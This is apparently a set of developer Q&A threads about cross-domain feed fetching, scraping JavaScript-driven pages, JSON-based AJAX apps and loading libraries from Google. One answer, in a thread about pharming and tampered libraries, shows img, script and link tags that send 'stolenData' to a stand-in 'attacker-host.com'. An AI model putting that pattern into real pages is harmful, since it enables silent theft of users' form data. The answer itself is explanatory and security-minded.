I've been looking around for a decent jQuery feed/XML parser and found good plugins like jFeed and jParse (among a few others). None of these support retrieving an external feed though, which is something I'm after.
Pretty sure this is down to jQuery's $.ajax() method rather than the plugins themselves (as they'll be built from this).
Is there some sort of hack I could use to override jQuery, or a raw JavaScript alternative? Better still would be a better plugin, but even the more popular ones I found didn't support it.
Thanks
try this tuturial:
http://visualrinse.com/2008/09/24/how-to-build-a-simple-rss-reader-with-jquery/ (archive.org)
and demo
http://visualrinse.com/bradley/mm491/reader.html (archive.org)
I recently built AMJR (Asynchronous Multifeed JS Reader) cause I couldn't find something similar to what you ask...
AMJR was written to cover a specific need: A multi-feed reader written in JS. In other words, a feed reader that takes multiple feeds as input and outputs the last X from all the feeds in chronological order. An implementation you'll surely find in server-side languages but not in JS! Having such a functionality reside on the user's browser (client-side) can lift off some processing load especially on high-traffic sites which happen to integrate external feeds. Think of AMJR as your own "Yahoo Pipes" widget to mashup feeds altogether in the same output block.
To summarize things for AMJR:
It can fetch multiple feeds at once while sorting them at the same time chronologically.
It's simple to implement, small in size and fast to load.
It's non-blocking (asynchronous). This means that the browser will continue to load the rest of the page while feeds are loading.
It can handle a sh** load of feeds, but the resulting performance depends on your user's internet connection download speed. In this example I've deliberately chosen to fetch a ridiculous number of external feeds (150+) so you can see a) the non-blocking process and b) how fast it is.
Feeds are "proxied" via Google's infrastructure (or optionally via Yahoo's YQL), where they get "normalized" and then converted to (compressed) JSON before being sent back to the user's browser.
Built on jQuery but the dependency is so small you can easily adapt it to work with Mootools, YUI etc.
It works on all modern browsers.
Info/download at: http://nuevvo.com/labs/amjr/
Enjoy!
The answer looks to be on this page, using YQL instead of my own PHP proxy to handle the requests.
http://james.padolsey.com/javascript/cross-domain-requests-with-jquery/
After finding out that it's not possible to do a simple JavaScript call to handle these requests, this jQuery plugin looks ideal, going to try it out later.
In fact, for parsing of RSS feeds without jQuery you can use the Google AJAX Feed API. Works a treat.
http://code.google.com/apis/ajaxfeeds/examples.html
Thanks for the replies
If by retrieving an external feed you mean getting a feed from a different domain that the one your web application is, you can't (Same origin policy).
You will need some kind of proxy on the server side, like a PHP or python script (or whatever your favorite language is) that queries the external feeds and returns their contents to your application.
The jFeed plugin you checked has an example of a PHP proxy.
jFeed has a php proxy. I just had this need and jFeed was able to retrieve an external. PLease edit your comment if NOT using php is a requirement.
ANSWER (From what we know): Use jFeed!
:: However I just found out if your feed is 'not well-formed' it will break jFeed. :: Be warned
I can only recommend jFeed. I use a fork of it ( https://github.com/uhlenbrock/jfeed ) together with my phonegap project. The fork adds support for parsing the creator tag, and it works perfectly out of the box.
Related
There is a new fashion in calling jQuery, YUI, MooTools frameworks (and a lot of plugins too) from an external base site in order to be working with the latest builds.
In a pharming attack (just to mention one) the original library can be replaced by one infected in order to use it to manipulate the behavior of the library, the browser or the plug-ins. It's easy to capture form data, querystrings and other info using those libraries. It's easy to send it too.
So my question is:
Can the attacker also send this captured data to the same pharming emulated host from which has obtained the fake library?
There's a cross site JavaScript policy in the browser but is valid in this case? Remember that the fake library would be loaded from the same emulated host, and would also from the infected page, so there's no call to cross site DOM objects or functions.
Thanks a lot!
well, you should think about the ways javascript can transmit data to another site :
-ajax
-frames
-attaching external URL to dom objects
-webSockets
In the first two cases, although there are some hacks, because of the same origin policy, it is not possible to transmit data from a site to another hosted on a different (sub)domain or another using a different protocol.Even if the host is "poisoned" by "pharming", it doesn't mean that it will point to the same domain.
It is very easy to simply acces an external URL and send any GET data to it, simply by attaching that URL to a dom element that requires one :
<img src="http://attacker-host.com/?stolenData=stolenData" />
<script src="http://attacker-host.com/?stolenData=stolenData"></script>
<link href="http://attacker-host.com/?stolenData=stolenData" />
//... and so on
If the attacker implements a webSocket data transmitter and if you use a modern browser, the data exchange might work.
In conclusion, it can be done, although it would a bit unlikely to sabotage a DNS and to modify js libs in a way that the user could not tell.
EDIT: added the simplest solution : dom objects
As mentioned in a previous question, I'm coding a crawler for the QuakeLive website.
I've been using WWW::Mechanize to get the web content and this worked fine for all the pages except the one with matches. The problem is that I need to get all these kind of IDs:
<div id="ffa_c14065c8-d433-11df-a920-001a6433f796_50498929" class="areaMapC">
These are used to build specific matches URLs, but I simply can't.
I managed to see those IDs only via FireBug and no page downloader, parser, getter I tried was able to help here. All I can get is a simpler version of the page which code is the one you can see by "showing source code" in Firefox.
Since FireBug shows the IDs I can safely assume they are already loaded, but then I can't understand why nothing else gets them. It might have something to do with JavaScript.
You can find a page example HERE
To get at the DOM containing those IDs you'll probably have to execute the javascript code on that site. I'm not aware of any libraries that'd allow you to do that, and then introspect the resulting DOM within perl, so just controlling an actual browser and later asking it for the DOM, or only parts of it, seems like a good way to go about this.
Various browsers provide ways to be controlled programatically. With a Mozilla based browser, such as Firefox, this could be as easy as loading mozrepl into the browser, opening a socket from perl space, sending a few lines of javascript code over to actually load that page, and then some more javascript code to give you the parts of the DOM you're interested in back. The result of that you could then parse with one of the many JSON modules on CPAN.
Alternatively, you could work through the javascript code executed on your page and figure out what it actually does, to then mimic that in your crawler.
The problem is that mechanize mimics the networking layer of the browser but not the rendering or javascript execution layer.
Many folks use the web browser control provided by Microsoft. This is a full instance of IE in a control that you can host in a WinForm, WPF or plain old Console app. It allows you to, among other things, load the web page and run javascript as well as send and receive javascript commands.
Here's a reasonable intro into how to host a browser control: http://www.switchonthecode.com/tutorials/csharp-snippet-tutorial-the-web-browser-control
A ton of data is sent over ajax requests. You need to account for that in your crawler somehow.
It looks like they are using AJAX. I can see where the requests are being sent using FireBug. You may need to either pick up on this by trying to parse and execute javasript that affects the DOM.
You should be able to use WWW::HtmlUnit - it loads and executes javascript.
Read the FAQ. WWW::Mechanize doesn't do javascript. They're probably using javascript to change the page. You'll need a different approach.
Hey everyone, I've been thinking about how the majority of web apps works at the moment. If as an example the backend is written in java/php/python what you probably see is that the backend is "echoing / printing" the html ready to the browser, right.
For web apps that works using almost exclusively ajax, is there a reason to not simply communicate without html, as an example just by using JSON objects passing back and fourth between the server and client, and instead of "printing or echoing" html in our script/app backend we simply echo the json string, ajax fetches it and converts the JSON string to an object with all of our attributes/arrays and so on.
Surely this way we have less characters to send, no html tags and so on, and on the client side we simply use frameworks such as jQuery etc and create/format our html there instead of printing and echoing the html in the server scripts?
Perhaps people already do this but I have not really seen a lot of apps work this way?
The reason is that I want todo this is because I would like to separate the layer of presentation and logic more than it currently is, so instead of "echoing" html in my java/php I just "echo" json objects, and javascript takes care of the whole presentation layer, is there something fundamentally wrong with this, what are your opinions?
Thanks again Stackoverflow.
There are quite a few apps that work this way (simply communicating via AJAX using JSON objects rather than sending markup).
I've worked on a few and it has its advantages.
In some cases though (like when working with large result sets) it makes more sense to render the markup on the server side and send it to the browser. That way, you're not relying on JavaScript/DOM Manipulation to create a large document (which, depending on the browser, would perform poorly).
This is a very sensible approach, and is actually used in some of our applications in production.
The main weakness of the approach is that it increases the load on the browser resource-wise and therefore might - in light of browsers often already-sluggish JS performance - lead to worse user experience unless the presentation layer mechanics is very well tuned.
Now a days many webapps use this approach like gmail and other big apps even facebook this
the main advantage of this approach is user dont need to refresh all the pages and he gets what we want to show him or what he desired.
but we have to make a both version like ajax and normal page refresh what if the user refresh the page.
we can use jquery template which generates html and also google's closer which is used by a gmail and other google products.
There are many tools that scrape HTML pages with javascript off, however are there any that will scrape with javascript on, including pressing buttons that are javascript callbacks?
I'm currently trying to scrape a site that is soley navigated through javascript calls. All the buttons that lead to the content execute javascript without a href in sight. I could reverse engineer the javascript calls (that do, in part return HTML) but that is going to take some time, are there any short cuts?
I use htmlunit, generally wrapped in a Java-based scripting language like JRuby. HtmlUnit is fantastic because it's JavaScript engine handles all of the dynamic functionality including AJAX behind the scenes. Makes it very easy to scrape.
Have you tried using scRubyIt? I'm not 100% sure, but I think I used it to scrape somo dynamic web sites.
It has some useful methods like
click_link_and_wait 'Get results', 5
Win32::IE::Mechanize
You could use Watij if you're into Java ( and want to automate Internet Explorer ). Alternatively, you can use Webdriver and also automate Firefox. Webdriver has a Python API too.
At the end of the day, those website which do not use Flash or other embedded plugins will need to make HTTP requests from the browser to the server. Most, if not all of those requests will have patterns within their URI's. Use Firebug/LiveHTTPHeaders to capture all the requests, which in turn will let you see what data comes back. From there, you can build ways to grab the data you want.
That is, of course, they are not using some crappy form of obfuscation/encryption to slow you down.
Google hosts some popular JavaScript libraries at:
http://code.google.com/apis/ajaxlibs/
According to google:
The most powerful way to load the libraries is by using google.load() ...
What are the real advantages of using
google.load("jquery", "1.2.6")
vs.
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
?
Aside from the benefit of Google being able to bundle multiple files together on the request, there is no perk to using google.load. In fact, if you know all libraries that you want to use (say just jQuery 1.2.6), you're possibly making the user's browser perform one unneeded HTTP connection. Since the whole point of using Google's hosting is to reduce bandwidth consumption and response time, the best decision - if you're just using 1 library - is to call that library directly.
Also, if your site will be using any SSL certificates, you want to plan for this by calling the script via Google's HTTPS connection. There's no downside to calling a https script from an http page, but calling an http script from an https page will causing more obscure debugging problems than you would want to think about.
It allows you to dynamically load the libraries in your code, wherever you want.
Because it lets you switch directly to a new version of the library in the javascript, without forcing you to rebuild/change templates all across your site.
It lets Google change the URL (but they can't since the URL method is already established)
In theory, if you do several google.load()s, Google can bundle then into one file, but I don't think that is implemented.
I find it's very useful for testing different libraries and different methods, particularly if you're not used to them and want to see their differences side by side, without having to download them. It appears that one of the primary reason to do it, would be that it is asynchronous versus the synchronous script call. You also get some neat stuff that is directly included in the google loader, like client location. You can get their latitude and longitude from it. Not necessarily useful, but it may be helpful if you're planning to have targeted advertising or something of the like.
Not to mention that dynamic loading is always useful. Particularly to smooth out the initial site load. Keeping the initial "site load time" down to as little as possible is something every web designer is fighting an uphill battle on.
You might want to load a library only under special conditions.
Additionally the google.load method would speed up the initial page display. Otherwise the page rendering will freeze until the file has been loaded if you include script tags in your html code.
Personally, I'm interested in whether there's a caching benefit for browsers that will already have loaded that library as well. Seems like if someone browses to google and loads the right jQuery lib and then browses to my site and loads the right jQuery lib... ...both might well use the same cached jQuery. That's just a speculative possibility, though.
Edit: Yep, at very least when using the direct script tags to the location, the javascript library will be cached if someone has already called for the library from google (e.g. if it were included by another site somewhere).
If you were to write a boatload of JavaScript that only used the library when a particular event happens, you could wait until the event happens to download the library, which avoids unnecessary HTTP requests for those who don't actually end up triggering the event. However, in the case of libraries like Prototype + Scriptaculous, which downloads over 300kb of JavaScript code, this isn't practical.